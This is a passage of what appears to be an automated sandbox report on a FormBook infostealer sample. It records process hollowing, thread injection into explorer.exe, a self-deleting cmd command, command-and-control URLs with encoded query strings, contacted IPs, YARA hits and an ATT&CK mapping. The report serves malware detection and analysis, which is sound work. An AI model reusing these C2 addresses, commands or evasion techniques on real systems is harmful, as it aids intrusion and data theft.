          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0373740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0373740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0373740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_037214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03738CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.valorplanodesaudemaranhao.info
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.196.84 80
          Source: C:\Windows\explorer.exeDomain query: www.everybankatm.com
          Source: C:\Windows\explorer.exeDomain query: www.nordiqueluxury.com
          Source: C:\Windows\explorer.exeDomain query: www.quickskiplondon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.singularity.institute
          Source: C:\Windows\explorer.exeDomain query: www.parakhonskiy.com
          Source: C:\Windows\explorer.exeDomain query: www.lifewithbriana.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.237.65.63 80
          Source: C:\Windows\explorer.exeNetwork Connect: 84.34.147.60 80
          Source: C:\Windows\explorer.exeDomain query: www.municipiodeanton.net
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: B40000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeMemory written: C:\Users\user\Desktop\scan files 15-9-21.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3292
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
          Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000003.00000000.270333689.0000000005F40000.00000004.00000001.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.358263429.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeQueries volume information: C:\Users\user\Desktop\scan files 15-9-21.exe VolumeInformation
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483582 Sample: scan files 15-9-21.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 31 www.getcenteredwithclay.com 2->31 33 www.actonetheatre.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 9 other signatures 2->47 11 scan files 15-9-21.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\scan files 15-9-21.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 scan files 15-9-21.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.nordiqueluxury.com 84.34.147.60, 49776, 80 TSF-IP-CORETeliaFinlandOyjEU Finland 18->35 37 www.singularity.institute 172.67.196.84, 49784, 80 CLOUDFLARENETUS United States 18->37 39 8 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          scan files 15-9-21.exe29%VirustotalBrowse
          scan files 15-9-21.exe27%ReversingLabsByteCode-MSIL.Spyware.Noon
          scan files 15-9-21.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.scan files 15-9-21.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.municipiodeanton.net/mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN0%Avira URL Cloudsafe
          http://www.quickskiplondon.com/mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN0%Avira URL Cloudsafe
          http://www.nordiqueluxury.com/mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN0%Avira URL Cloudsafe
          http://www.singularity.institute/mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN0%Avira URL Cloudsafe
          www.lifewithbriana.com/mej0/0%Avira URL Cloudsafe
          http://www.valorplanodesaudemaranhao.info/mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.getcenteredwithclay.com
          99.83.154.118
          truetrue
            unknown
            www.nordiqueluxury.com
            84.34.147.60
            truetrue
              unknown
              quickskiplondon.com
              34.98.99.30
              truefalse
                unknown
                valorplanodesaudemaranhao.info
                34.98.99.30
                truefalse
                  unknown
                  www.singularity.institute
                  172.67.196.84
                  truetrue
                    unknown
                    www.municipiodeanton.net
                    35.237.65.63
                    truefalse
                      unknown
                      www.valorplanodesaudemaranhao.info
                      unknown
                      unknowntrue
                        unknown
                        www.everybankatm.com
                        unknown
                        unknowntrue
                          unknown
                          www.parakhonskiy.com
                          unknown
                          unknowntrue
                            unknown
                            www.lifewithbriana.com
                            unknown
                            unknowntrue
                              unknown
                              www.actonetheatre.com
                              unknown
                              unknowntrue
                                unknown
                                www.quickskiplondon.com
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.municipiodeanton.net/mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKNfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.quickskiplondon.com/mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKNfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.nordiqueluxury.com/mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKNtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.singularity.institute/mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKNtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  www.lifewithbriana.com/mej0/true
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.valorplanodesaudemaranhao.info/mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKNfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.270733342.000000000686B000.00000004.00000001.sdmpfalse
                                    high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.67.196.84
                                    www.singularity.instituteUnited States
                                    13335CLOUDFLARENETUStrue
                                    35.237.65.63
                                    www.municipiodeanton.netUnited States
                                    15169GOOGLEUSfalse
                                    34.98.99.30
                                    quickskiplondon.comUnited States
                                    15169GOOGLEUSfalse
                                    84.34.147.60
                                    www.nordiqueluxury.comFinland
                                    1759TSF-IP-CORETeliaFinlandOyjEUtrue

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:483582
                                    Start date:15.09.2021
                                    Start time:09:29:55
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 10m 20s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:scan files 15-9-21.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:25
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/1@10/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 37.3% (good quality ratio 32.9%)
                                    • Quality average: 72.8%
                                    • Quality standard deviation: 32.7%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.82.210.154, 23.55.161.159, 23.55.161.158, 23.55.161.152, 23.55.161.153, 23.55.161.155, 23.55.161.160, 23.55.161.156, 23.55.161.151, 23.55.161.157, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:30:58API Interceptor1x Sleep call for process: scan files 15-9-21.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    84.34.147.60Split BL_PL.exeGet hashmaliciousBrowse
                                    • www.nordiqueluxury.com/mej0/?qRGT=Lzu4IHzP&EHSh=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcI1+Y0YZ8RZFFgSMA==

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    www.nordiqueluxury.comSplit BL_PL.exeGet hashmaliciousBrowse
                                    • 84.34.147.60
                                    www.getcenteredwithclay.comscan documents 31AUG.exeGet hashmaliciousBrowse
                                    • 99.83.154.118

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    CLOUDFLARENETUS86jLEXtwqR.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    6WtKevhqlg.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    oLn3NAKPzu.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    hd9uHo4dot.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    47U9eIz5bG.exeGet hashmaliciousBrowse
                                    • 162.159.135.233
                                    x13NYP60fd.exeGet hashmaliciousBrowse
                                    • 162.159.130.233
                                    ivR7bfFqYWqLlce.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    PO7420.exeGet hashmaliciousBrowse
                                    • 23.227.38.65
                                    #Ud83d#Udd09_ 3pm.htmlGet hashmaliciousBrowse
                                    • 104.16.18.94
                                    MktxljHVy8.exeGet hashmaliciousBrowse
                                    • 104.21.33.32
                                    Elon Musk Club - 024705 .htmGet hashmaliciousBrowse
                                    • 104.18.11.207
                                    N3sJiiIQAP.exeGet hashmaliciousBrowse
                                    • 104.21.79.144
                                    4478884ce2cf578bf0a0d2484fc8221e5ff63d7cbc73d5200bacbd6e2796e017.exeGet hashmaliciousBrowse
                                    • 162.159.133.233
                                    aZq3gco8Ab.exeGet hashmaliciousBrowse
                                    • 104.18.7.156
                                    Medical-Engagement-Scale-Questionnaire.msiGet hashmaliciousBrowse
                                    • 104.16.119.102
                                    XbvAoRKnFm.exeGet hashmaliciousBrowse
                                    • 104.21.30.211
                                    PO12031.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    m3maOnY6Uy.exeGet hashmaliciousBrowse
                                    • 172.67.193.227
                                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                                    • 172.67.160.135
                                    vkb.xlsxGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    TSF-IP-CORETeliaFinlandOyjEUre2.armGet hashmaliciousBrowse
                                    • 80.223.250.166
                                    p4vXpD0P73Get hashmaliciousBrowse
                                    • 88.195.12.199
                                    4nLik56DrDGet hashmaliciousBrowse
                                    • 195.165.207.156
                                    jKira.x86Get hashmaliciousBrowse
                                    • 84.250.68.111
                                    TG42Y4BxqhGet hashmaliciousBrowse
                                    • 194.251.24.136
                                    v17c18jKB5Get hashmaliciousBrowse
                                    • 139.157.217.112
                                    wGQzwtqpmtGet hashmaliciousBrowse
                                    • 195.156.115.155
                                    Rry5mHEWuHGet hashmaliciousBrowse
                                    • 84.249.96.0
                                    2vMBHaZcM5Get hashmaliciousBrowse
                                    • 160.71.100.185
                                    dark.ppcGet hashmaliciousBrowse
                                    • 84.249.1.45
                                    armGet hashmaliciousBrowse
                                    • 139.74.185.176
                                    arm6Get hashmaliciousBrowse
                                    • 88.195.171.107
                                    arm7Get hashmaliciousBrowse
                                    • 194.251.84.27
                                    dark.mpslGet hashmaliciousBrowse
                                    • 144.5.81.225
                                    e1m5cZ52idGet hashmaliciousBrowse
                                    • 88.195.59.164
                                    AUMqW7UOsXGet hashmaliciousBrowse
                                    • 88.192.177.209
                                    XwQCL6wkKkGet hashmaliciousBrowse
                                    • 86.114.146.182
                                    Jprt6IyzLGGet hashmaliciousBrowse
                                    • 80.223.191.22
                                    5ngwCCLYG2Get hashmaliciousBrowse
                                    • 157.202.152.65
                                    WJoQO4idRiGet hashmaliciousBrowse
                                    • 62.73.56.129

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scan files 15-9-21.exe.log
                                    Process:C:\Users\user\Desktop\scan files 15-9-21.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:true
                                    Reputation:high, very likely benign file
